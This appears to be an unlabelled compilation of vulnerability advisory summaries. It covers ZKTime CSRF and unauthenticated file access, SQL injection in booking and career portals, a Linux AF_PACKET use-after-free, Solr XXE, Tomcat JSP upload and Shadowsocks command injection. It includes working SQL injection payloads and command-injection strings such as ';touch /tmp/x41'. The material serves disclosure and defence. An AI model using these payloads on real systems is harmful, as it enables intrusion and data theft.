If a long user name is used in a username/password combination in a site URL (such as http://UserName:Password@example.com), the resulting modal prompt will hang in a non-responsive state or crash, causing a denial of service.
The Application is a time attendance software which allows users to download their time and attendance data from the application in a PDF Format. The data includes their employee’s id, user-id, gender, birth-dates, phone numbers and access-areas. These PDF Files however are not properly authenticated. If any user get access to the file-download link, he can go ahead and download these files directly without any authentication.
The ZKTime Web Software allows the Administrator to elevate the privileges of the application user by simple click of a radio button namely 'superuser'. However when the request is generated there are no random tokens attached to this request to prevent any kind of Cross Site Request Forgery attacks. Moreover there no other protections (like administrator password verification etc.) mechanisms in place to block any kind of forged requests. An Attacker takes advantage of this scenario and creates a crafted link to add himself as an administrator to the ZKTime Web Software. He then uses social engineering methods to trick the administrator into click the forged http request. The request is executed and the attacker becomes the Administrator of the ZKTime Web Software.
SQL injection on [space_id] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/booking-page/?step=3&space_id=9 AND SLEEP(5)&re_price=12 Parameter: space_id (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: step=3&space_id=9 AND SLEEP(5)&re_price=12
Career Portal is developed for creating an interactive job vacancy for candidates. SQL injection on [keyword] parameter. Proof of Concept (PoC): SQLi: https://localhost/[path]/job Parameter: keyword (POST) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: keyword=s_term') AND (SELECT 8133 FROM(SELECT COUNT(*),CONCAT(0x716b6a7171,(SELECT (ELT(8133=8133,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND ('kRoT'='kRoT&location_name[]= Type: UNION query Title: Generic UNION query (NULL) - 25 columns Payload: keyword=s_term') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716b6a7171,0x594547646454726868515056467764674e59726f4252436844774f41704a507353574e4b6d5a5973,0x71787a7871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- zANd&location_name[]=
This use-after-free is due to a race condition between fanout_add (from setsockopt) and bind on a AF_PACKET socket. The race will cause __unregister_prot_hook() from packet_do_bind() to set po->running to 0 even though a packet_fanout has been created from fanout_add(). This allows us to bypass the check in unregister_prot_hook() from packet_release() effectively causing the packet_fanout to be released and still being referenced from the packet_type linked list.
Lucene includes a query parser that is able to create the full-spectrum of Lucene queries, using an XML data structure. Starting from version 5.1 Solr supports 'xml' query parser in the search query. The problem is that lucene xml parser does not explicitly prohibit doctype declaration and expansion of external entities. It is possible to include special entities in the xml document, that point to external files (via file://) or external urls (via http://). When Solr is parsing this request, it makes a HTTP request to http://xxx.s.artsploit.com/xxx and treats its content as DOCTYPE definition. Considering that we can define parser type in the search query, which is very often comes from untrusted user input, e.g. search fields on websites. It allows to an external attacker to make arbitrary HTTP requests to the local SOLR instance and to bypass all firewall restrictions. For example, this vulnerability could be user to send malicious data to the '/upload' handler. This vulnerability can also be exploited as Blind XXE using ftp wrapper in order to read arbitrary local files from the solrserver.
When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.
Log file manipulation is possible with a manipulated hostname, sent to the server from a client, even if Shadowsocks is as quiet as possible with '-qq'. Therefore a string like 'I could be any log entry' could be sent as hostname to Shadowsocks. The server would log an additional line with 'I could be any log entry'. Command execution is possible with a manipulated hostname, sent to the server from a client. Therefore a string like ';touch /tmp/x41' could be sent as hostname to Shadowsocks. The server would execute the command 'touch /tmp/x41'.
Shadowsocks-libev offers local command execution per configuration file or/and additionally, code execution per UDP request on 127.0.0.1. The configuration file on the file system or the JSON configuration received via UDP request is parsed and the arguments are passed to the 'add_server' function. The function calls 'construct_command_line(manager, server);' which returns a string from the parsed configuration. The string gets executed at line 486 'if (system(cmd) == -1) {', so if a configuration parameter contains '||evil command&&' within the 'method' parameter, the evil command will get executed.
Services By CQR